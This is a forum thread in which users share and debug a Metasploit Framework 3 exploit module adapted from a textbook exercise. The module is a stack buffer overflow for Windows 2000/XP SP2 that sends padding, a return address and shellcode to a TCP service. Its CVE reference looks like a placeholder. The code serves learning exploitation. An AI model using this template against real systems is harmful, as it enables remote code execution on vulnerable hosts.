Post #2
##
# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf
  class Exploits::Yangshuo::POC < Msf::Exploit::Remote
    include Exploit::Remote::Tcp

    def initialize(info = {})
      super(update_info(info,
        'Name' => 'YANGSHUO_POC',
        'Version' => '1.0',
        'Platform' => 'win',
        'Privileged' => true,
        'License' => MSF_LICENSE,
        'Author' => 'yangshuo',
        'Targets' => [
          ['Windows 2000', {'Ret' => [200, 0x77e2307b] }],
          ['Windows XP SP2', {'Ret' => [200, 0x7C914393] }],
        ],
        'DefaultTarget' => 0,
        'Payload' => {
          'Space' => 200,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Description' => %q{
          this module is exploit practice of book
          "Vulnerability Exploit and Analysis Technique"
          used only for educational purpose
        },
        'Arch' => 'x86',
        'References' => [
          [ 'URL', 'http://www.failwest.com' ],
          [ 'CVE', '44444' ],
        ],
        'DefaultOptions' => { 'EXITFUNC' => 'process' }
      ))
    end #end of initialize

    def exploit
      connect
      print_status("Sending #{payload.encoded.length} byte payload...")
      buf = 'a' * target['Ret'][0]
      buf << [target['Ret'][1]].pack('V')
      buf << payload.encoded
      sock.put(buf)
      handler
      disconnect
    end #end of exploit def
  end
end
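This is what I got by modifying FAILWEST's code. Take a look: it has to conform to the MF3 standard to work. That ID above, # $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
class Exploits::Yangshuo::POC: this class name must be capitalized, otherwise it throws an error!~~~~~
Give it a try, and if it doesn't work, post again!
In short, your stuff has to meet MF3's requirements, otherwise there is no way it will be recognized.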
Post #3
I ran into this too, but this method doesn't seem to help; it doesn't work even with everything capitalized. I'm using 3.3.4.
Post #4
Buddy, then how come it works for me!~~~ Paste my code in and see; if it doesn't work, post again!~~~